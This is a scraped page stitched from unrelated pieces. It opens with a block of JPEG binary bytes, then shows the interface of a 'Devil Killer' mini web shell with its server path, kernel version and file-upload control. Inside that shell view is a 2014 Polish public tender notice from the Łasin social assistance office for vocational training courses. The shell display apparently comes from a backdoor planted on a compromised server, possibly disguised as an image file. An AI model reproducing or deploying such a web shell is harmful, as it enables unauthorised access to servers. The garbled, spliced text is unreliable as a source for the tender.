JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140321/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140321/60857-N-2014.html

<p class="kh_header"><b>Łasin: Wykonanie usługi w zakresie szkoleń dla osób zakwalifikowanych do udziału w projekcie Pomysł na aktywność</b><br>
<b>Numer ogłoszenia: 60857 - 2014; data zamieszczenia: 21.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Łasinie , ul. Radzyńska 2, 86-320 Łasin, woj. kujawsko-pomorskie, tel. 56 466 47 12, faks 56 466 47 12.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi w zakresie szkoleń dla osób zakwalifikowanych do udziału w projekcie Pomysł na aktywność.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.PRZEDMIOT ZAMÓWIENIA OBEJMUJE SZKOLENIA/KURSY DLA 52 OSÓB, A W TYM:
A.	Szkolenia dla 2 osób na n.w. kursach - termin wykonania od 01 maja do 30 czerwca 2014r.:
1)Kurs pracownika administracyjnego z obsługą komputera 100h dla 2 Beneficjentów Ostatecznych (dalej zwanych BO) w terminie od 01 maja do 30 czerwca 2014r.
Celem kursu jest przygotowanie do wykonywania pracy w charakterze pracownika administracyjno-biurowego.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r., poz. 186 z późn. zm.) (zwane dalej Rozporządzeniem MEN).
2)Poradnictwa zawodowego w celu przygotowania do podjęcia stażu/zatrudnienia dla 2 BO w wymiarze 8h zajęć grupowych w okresie od 01 maja do 30 czerwca 2014r.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
3)Pośrednictwa pracy jako wsparcie ułatwiające wejście na rynek pracy dla 2 BO w wymiarze 8h zajęć grupowych w okresie od 01 maja do 30 czerwca 2014r.
Wymagane dokumenty potwierdzające ukończenie kursu zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
B.Szkolenie dla 27 osób na n.w. kursach - termin wykonania od 01maja do 31 sierpnia 2014r.:
1)Kurs operatora koparko-ładowarki - wszystkie typy, klasa III, liczba godzin 202 h (teoria i praktyka) dla 5 BO.
Program szkolenia powinien być zgodny z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. (Dz. U. nr 118, poz.1263) w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych oraz zatwierdzony przez Instytut Mechanizacji  Budownictwa i Górnictwa Skalnego w Warszawie na prowadzenie szkoleń dla operatorów koparko-ładowarek.
Wymagane dokumenty potwierdzające uzyskane kwalifikacje w zawodzie operatora koparko-ładowarek: Książka Operatora Maszyn Roboczych oraz Świadectwo wydane przez IMBiGS w Warszawie, po ukończeniu szkolenia i zdaniu egzaminów.
2)Kurs na wózek jezdniowy z bezpieczną wymianą butli gazowych propan - butan, łącznie 67h (w tym: 47h teoria, 20h praktyka) dla 3 BO
Celem szkolenia w zakresie obsługi wózka jezdniowego z bezpieczną wymianą butli gazowych propan butan jest nabycie uprawnień do obsługi wózków jezdniowych.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr  5 do Rozporządzenia MEN.
3)Kurs magazyniera (40h) z obsługą wózków jezdniowych z bezpieczną wymiana butli gazowych propan - butan (67h: 47h teoria, 20h praktyka), łącznie 107 h dla 7 BO
Celem szkolenia magazyniera jest przyuczenie do wykonywania pracy na stanowisku magazyniera oraz nadzorującego pracę magazynu poprzez nabycie umiejętności w zakresie: organizacji pracy w magazynach, poznanie podstaw zagospodarowania magazynu i technologii magazynowania, prowadzenia dokumentacji magazynowej, obiegu dokumentów i towarów w magazynie, obsługi programów magazynowych.
Celem szkolenia w zakresie obsługi wózka jezdniowego z bezpieczną wymiana butli gazowych propan butan jest nabycie uprawnień do obsługi wózków jezdniowych.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
4)Kurs spawacza metodą MAG (135)- 145h(teoria i praktyka) dla 2 BO
Program szkolenia powinien być zgodny z wytycznymi nr W-07/IS-02 opracowanymi przez Instytut Spawalnictwa w Gliwicach.
Wymagane dokumenty: Książka Spawacza oraz Certyfikat wydane przez Instytut Spawalnictwa w Gliwicach po ukończeniu szkolenia i zdaniu egzaminów.
5)Kurs - rusztowania budowlano - montażowe, metalowe (80h: 48h teoria, 32h praktyka) wraz z kursem ogólnobudowlanym(120h: teoria 40h, praktyka 80h), łącznie 200 h dla 3 BO
Program szkolenia powinien być zgodny z Rozporządzeniem Ministra Gospodarki z dnia 20.09.2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń mechanicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263) oraz zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
Wymagane dokumenty: Książka Operatora Maszyn Roboczych oraz Świadectwo Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego po ukończeniu szkolenia i zdaniu egzaminów, a w przypadku kursu ogólnobudowlanego zaświadczenie zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
6)Kurs ogrodnika terenów zielonych 60h(teoria 24 h, praktyka 36h). Zajęcia teoretyczne i praktyczne winny odbywać się na terenie miasta i gminy Łasina dla 6 BO. Miejsce zajęć praktycznych i teoretycznych wskazuje Wykonawca.
Celem szkolenia jest wyposażenie w wiadomości i wykształcenie umiejętności niezbędnych do wykonywania prac ogrodniczych przy zakładaniu i pielęgnowaniu terenów zieleni oraz do zaprojektowania i zagospodarowania zielenią ogrodów.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
7)Kurs operatora pił mechanicznych do ścinki drzew w zakresie III klasy uprawnień 44h (32h, 12h praktyki) dla 1 BO
Program szkolenia zgodny z Rozporządzeniem ministra Gospodarki z dnia 20.09.2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych , budowlanych i drogowych (Dz. U. Nr 118 poz. 1263) oraz zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. 
Wymagane dokumenty: Książka Operatora Maszyn Roboczych wydanych przez IMiBS w Warszawie.
C.Szkolenie dla 23 osób na n/w kursach - termin wykonania od 08 września do 05 grudnia2014r.:
1)Profesjonalny sprzedawca z modułami Podstawowych Zagadnień Higieny (10h), obsługą kas i urządzeń fiskalnych (16h), BHP (8h), teoria sprzedawcy (24h) i praktyki (120h), łącznie 178h dla 6 BO
Kurs powinien obejmować następujące zagadnienia: skuteczne techniki sprzedaży, standardy obsługi klienta, negocjacje handlowe. praktyki powinny odbywać się w odpowiednich miejscach dla tego rodzaju kursu. Program szklenia powinien być zgodny z przepisami obowiązującego prawa.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
2)Kurs grafika komputerowego, łącznie 100h dla 1 BO
Celem szkolenia  jest przygotowanie do pracy w zawodzie grafika komputerowego.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
3)Kurs małej gastronomii (40 h teorii, 120 h praktyki) dla 9 BO
Celem szkolenia jest nabycie podstawowych umiejętności  niezbędnych do wykonywania zawodu kucharza małej gastronomii.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
4)Opiekuna-ki osób starszych i dzieci, 160 h (40h teorii, 120 h praktyk w przedszkolu oraz w szpitalu-Domu Pomocy Społecznej) dla 4 BO
Celem szkolenia jest przygotowanie słuchaczy do pełnienia roli opiekuna osoby starszej, dziecka.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
5)Kurs fryzjerstwa 160h(teoria 40h, praktyka 120) dla 2 BO
Zajęcia praktyczne winny odbywać się w zakładach fryzjerskich bądź w miejscu spełniającym wymogi dla kursu.
Celem kursu jest nabycie umiejętności pielęgnacji i stylizacji włosów, organizacji salonu fryzjerskiego.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
6)Kurs pracownika administracyjnego z obsługą komputera 100h dla 1 BO
Celem kursu jest przygotowanie do wykonywania pracy w charakterze pracownika administracyjno-biurowego.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
D.Szkolenie dla 52 osób na n.w. kursach - termin wykonania od 01 maja do 09 grudnia 2014r.:
1)Trening kompetencji i umiejętności społecznych w wymiarze 40h w okrasie od 01 maja do 09 grudnia 2014r. dla 52 BO, przy czym w każdym miesiącu musi odbyć się 5h zajęć,
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
2)Zajęcia z doradcą zawodowym-trenerem pracy w zakresie aktywnego poszukiwania pracy w wymiarze 40h w okrasie od 01 maja do 09 grudnia 2014r. dla 52 BO, przy czym w każdym miesiącu musi odbyć się 5h zajęć, 
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z załącznikiem nr 5 do Rozporządzenia MEN.
2.W RAMACH REALIZACJI ZAMÓWIENIA WYKONAWCA POWINIEN:
1)zapewnić dowóz 46 uczestników szkoleń-kursów, w tym osób niepełnosprawnych spod budynku Miejsko - Gminnego Ośrodka Pomocy Społecznej w Łasinie na miejsce szkoleń-kursów, jak również powrót z miejsca szkolenia przed budynek siedziby MGOPS w Łasinie. Szkolenia-kursy powinny odbywać się nie dalej niż w odległości 40 kilometrów od Łasina. W przypadku kursu ogrodnik terenów zielonych zajęcia praktyczne i teoretyczne dla 6 osób winny odbywać się na terenie miasta i gminy Łasina.Miejsce zajęć praktycznych i teoretycznych wskazuje Wykonawca.
2)prowadzić szkolenia w dniach od poniedziałku do soboty, od godz. 9.00 w wymiarze nie przekraczającym 8 godzin dydaktycznych dziennie (godz. dydaktyczna=45 minut);
3)ubezpieczyć osoby skierowane na szkolenia-kursy;
4)pokryć koszt niezbędnych badań koniecznych do odbywania kursu zawodowego.  Koszty badań należy wliczyć w koszt szkolenia i ująć w kalkulacji kosztów kursu. Uczestnicy kursu przed przystąpieniem do zajęć powinni zostać skierowani przez Wykonawcę na niezbędne badania;
5)zapewnić opiekuna podczas przewozu osób na badania lekarskie i podczas powrotu z tych badań;
6)zapewnić zestaw materiałów pomocniczych, w tym podstawowe materiały piśmiennicze niezbędne do prowadzenia notatek, tj. zeszyt i długopis oraz dostęp do sprzętu dydaktycznego niezbędnego do prawidłowego przebiegu szkolenia i przygotowania do egzaminu końcowego. Materiały szkoleniowe powinny być opatrzone w logo, zgodnie z wytycznymi oznaczenia projektu PO KL, po zakończeniu szkolenia materiały te przejdą na własność każdego uczestnika;
7)udostępnić uczestnikom kursów odzież ochronną i obuwie, jeżeli tego wymaga specyfika kursu;
8)prowadzić dokumentację przebiegu szkolenia-kursu (w tym: dziennik zajęć zawierający dane dotyczące wymiaru godzin, tematów zajęć, listy obecności uczestników, protokoły egzaminacyjne, rejestr certyfikatów i świadectw ukończenia szkoleń-kursów, dokumentację zdjęciową itp.);
9)zapewnić lokal w celu odbywania zajęć teoretycznych i praktycznych poszczególnych szkoleń-kursów dla 52 osób;
10)z wyłączeniem osób objętych kursami/szkoleniami określonymi w niniejszym Rozdziale ust. 1 lit. A pkt 2 i 3 oraz ust. 1 lit. D pkt 1 i 2 - zapewnić pełne wyżywienie - obiad jednodaniowy, bufet kawowy dla 52 uczestników pozostałych szkoleń-kursów zawodowych;
11)dostarczyć Zamawiającemu po zakończeniu szkolenia/kursu w terminie 5 dni roboczych od daty zakończenia listy obecności, protokoły egzaminacyjne wraz z kserokopią wydanych zaświadczeń, świadectw, rejestry certyfikatów itp.;
12)niezwłocznie poinformować Zamawiającego o wszelkich zmianach mających wpływ na przebieg realizacji szkolenia;
13)przekazać Zamawiającemu po zakończeniu szkoleń-kursów:
a)imienny wykaz osób, które ukończyły szkolenie,
b)imienny  wykaz osób, które nie ukończyły szkolenia,
13)potwierdzone za zgodność z oryginałem kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu-szkolenia; 
14)udostępnić Zamawiającemu na jego żądanie dokumenty dotyczące etapu w realizacji szkoleń-kursów;
15)poddać się kontroli dokonywanej przez Zamawiającego lub przez Instytucję Wdrażającą oraz inne uprawnione podmioty w zakresie prawidłowości realizacji projektu systemowego Pomysł na aktywność.
3.W RAMACH REALIZACJI ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
1)świadczenia usług przez wykładowców i instruktorów posiadających odpowiednie kwalifikacje do przeprowadzenia szkoleń-kursów;
2)bieżącego informowania Zamawiającego o przypadkach nieobecności na szkoleniu-kursie osób skierowanych;
3)umieszczenia obowiązujących logotypów zgodnie z wytycznymi PO KL na dokumentach dotyczących realizacji szkoleń-kursów;
4)umieszczania informacji na budynkach i pomieszczeniach szkoleniowych o prowadzeniu projektu systemowego Pomysł na aktywność;
5)prowadzenia działań informacyjno-promocyjnych kierowanych do opinii publicznej, informujących o finansowaniu realizacji projektu systemowego pn. Pomysł na aktywność przez Unię Europejską zgodnie z wytycznymi oznaczania projektu PO KL.;
6)informowania uczestników Projektu pn. Pomysł na aktywność o współfinansowaniu Projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
4.INNE ISTOTNE WARUNKI ZAMÓWIENIA:
1)czas trwania egzaminu nie może być ujęty w liczbie godzin programu kursu;
2)w okresie trwania zajęć teoretycznych i praktycznych Wykonawca ma obowiązek zapewnić kursantom warunki zgodne z przepisami bezpieczeństwa i higieny pracy.
3)zamawiający ma prawo wnieść uwagi do przedstawionego w dniu podpisania umowy harmonogramu szkoleń, które Wykonawca winien uwzględnić. Harmonogram szkoleń/kursów winien być uzgodniony przez obie strony;
4)do umowy wykonawca dołącza w dniu podpisania umowy harmonogramy zajęć, z wyszczególnieniem wykładowców i instruktorów prowadzących zajęcia, terminy oraz miejsce odbywania zajęć;
5)wszystkie szkolenia i zajęcia praktyczne winny być prowadzone przez wykładowców i instruktorów posiadających odpowiednie wykształcenie kierunkowe oraz doświadczenie w realizacji szkoleń i treningów;
6)usprawiedliwienia nieobecności uczestników może dokonać jedynie przedstawiciel Zamawiającego na podstawie dostarczonych mu dokumentów;
7)Wykonawca zobowiązany jest do przeprowadzenia ankiety badającej poziom zadowolenia słuchaczy, która stanowi załącznik nr 2 do projektu umowy dla osób biorących udział w szkoleniach oraz odrębnej ankiety badającej poziom zadowolenia uczestników..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca przedstawi:
1)zawiadomienie w rozumieniu ustawy z dnia 20 kwietnia 2014 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2013 r., poz. 674 z późn. zm.) o wpisie do rejestru instytucji szkoleniowych wraz z aktualizacją na 2014 rok prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej,
2)potwierdzenie, że podmiot prowadzący szkolenia określone w § 23 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263) (zwane dalej RMG) w zakresie kursów operatora koparko-ładowarek - wszystkie typy, kl. III, operatora pił mechanicznych do ścinki drzew - wszystkie typy, klasa III, rusztowania budowlano- montażowe, metalowe spełnia wymagania określone w § 25 (RMG) - wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że zrealizowane zostało w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej jedno zamówienie polegające na wykonaniu n/w szkoleń/kursów:
a)kurs pracownika administracyjnego z obsługą komputera,
b)poradnictwo zawodowe,
c)pośrednictwo pracy,
d)kurs koparko-ładowarki wszystkie typy, klasa III,
e)kurs na wózek jezdniowy z bezpieczną wymianą butli gazowych propan - butan,
f)kurs magazyniera z obsługą wózków jezdniowych z bezpieczną wymianą butli gazowych propan- butan,
g)kurs spawacza metodą MAG(135),
h)kurs rusztowania budowlano- montażowe, metalowe wraz z kursem ogólnobudowlanym,
i)kurs ogrodnika terenów zielonych,
j)kurs operatora pił mechanicznych do ścinki drzew w zakresie III klasy uprawnień,
k)profesjonalny sprzedawca z modułami Podstawowych Zagadnień Higieny, obsługą kas i urządzeń fiskalnych, BHP, teorii, praktyki,
l)kurs- grafik komputerowy,
m)kurs małej gastronomii,
n)opiekun osób starszych i dzieci,
o)kurs fryzjerstwa,
p)trening kompetencji i umiejętności społecznych,
q)zajęcia z doradcą zawodowym-trenerem pracy w zakresie aktywnego poszukiwania pracy,
wraz z podaniem dat wykonania szkoleń-kursów, podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, że zostały wykonane należycie (poświadczenia, referencje, protokoły odbioru itp.). Druk wykazu zrealizowanych szkoleń/kursów stanowi załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca przedstawi oświadczenie i wykaz, z którego będzie wynikać, że dysponuje osobami posiadającymi uprawnienia do przeprowadzenia każdego z niżej wymienionych szkoleń-kursów:
a)kurs pracownika administracyjnego z obsługą komputera,
b)poradnictwo zawodowe,
c)pośrednictwo pracy,
d)kurs koparko-ładowarki wszystkie typy, klasa III,
e)kurs na wózek jezdniowy z bezpieczną wymianą butli gazowych propan - butan,
f)kurs magazyniera z obsługą wózków jezdniowych z bezpieczną wymianą butli gazowych propan- butan,
g)kurs spawacza metodą MAG(135),
h)kurs rusztowania budowlano- montażowe, metalowe wraz z kursem ogólnobudowlanym,
i)kurs ogrodnika terenów zielonych,
j)kurs operatora pił mechanicznych do ścinki drzew w zakresie III klasy uprawnień,
k)profesjonalny sprzedawca z modułami Podstawowych Zagadnień Higieny, obsługą kas i urządzeń fiskalnych, BHP, teorii, praktyki,
l)kurs- grafik komputerowy,
m)kurs małej gastronomii,
n)opiekun osób starszych i dzieci,
o)kurs fryzjerstwa,
p)trening kompetencji i umiejętności społecznych,
q)zajęcia z doradcą zawodowym-trenerem pracy w zakresie aktywnego poszukiwania pracy,
wraz z podaniem informacji na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Druk oświadczenia i wykazu stanowi załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej 50 000 zł (słownie: pięćdziesiąt tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

